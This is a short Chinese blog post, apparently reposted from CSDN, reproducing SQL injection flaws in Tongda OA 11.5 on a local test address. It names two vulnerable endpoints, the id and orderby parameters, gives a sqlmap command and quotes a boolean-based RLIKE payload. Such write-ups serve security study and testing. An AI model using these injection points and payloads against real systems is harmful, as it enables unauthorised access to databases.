通达OA 11.5 sql注入漏洞复现

下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe

1.登录一个账户
在这里插入图片描述2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包

id参数存在延时注入
在这里插入图片描述直接复制数据包,id参数加个*保存到sqlmap跑
python sqlmap.py -r 1.txt
在这里插入图片描述

orderby参数
构造/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=1&pagelimit=10&tag=&timestamp=1598069103&total=

在这里插入图片描述
payload:RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_45291045/article/details/113800862